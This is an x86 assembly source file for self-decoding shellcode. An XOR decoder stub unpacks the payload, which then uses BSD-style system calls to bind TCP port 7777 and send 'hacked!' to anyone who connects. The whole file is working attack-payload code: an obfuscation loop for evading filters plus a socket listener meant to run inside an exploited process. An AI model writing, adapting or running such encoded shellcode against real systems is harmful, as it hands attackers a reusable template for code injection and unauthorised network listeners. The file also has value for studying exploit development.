;
; Shellcode that binds to TCP port 7777 and returns the string hacked! to those who
; connect to it.
;
; Coded by Arne Vidstrom, http://ntsecurity.nu, http://vidstrom.net


	BITS	32

        ; Decode the shellcode

        jmp short first

second:

        pop	eax
        xor	ecx, ecx
        mov	cl, 151

nextone:	

        xor	byte [eax], 022h
        inc	eax
        loop	nextone
        jmp	short after

first:    

        call second

after:

        ; Call socket()

        mov     eax, 6
        push	eax
        mov     eax, 1
        push	eax
        mov     eax, 2
        push	eax
        xor     eax, eax
        push    eax
        mov     eax, 0x61
        int     0x80
        mov     esi, eax

	; Call bind()

        xor 	eax, eax
        push	eax
        push	eax
        push	eax
        push	0x611e0002
        mov 	edx, esp

        mov 	eax, 16
        push	eax
        push	edx
        push	esi
        xor     eax, eax
        push    eax
        mov     eax, 0x68
        int     0x80

	; Call listen()

	mov     eax, 5
	push	eax
	push	esi
        xor     eax, eax
        push    eax
	mov     eax, 0x6a
	int     0x80

socket_loop:

	; Call accept()

	sub     esp, 16
	mov     eax, esp
	mov     ebx, 16
	push	ebx
	mov     ebx, esp
	push	ebx
	push	eax
	push	esi
        xor     eax, eax
        push    eax
	mov     eax, 0x1e
	int     0x80
	mov     edi, eax

	; Call write()

	push	0x00216465
	push	0x6b636168
	mov     eax, esp
	mov     ebx, 7
	push	ebx
	push	eax
	push	edi
        xor     eax, eax
        push    eax
	mov     eax, 0x04
	int     0x80

	; Call close()

	push    edi
        xor     eax, eax
        push    eax
	mov     eax, 0x6
	int     0x80
		        
	jmp     socket_loop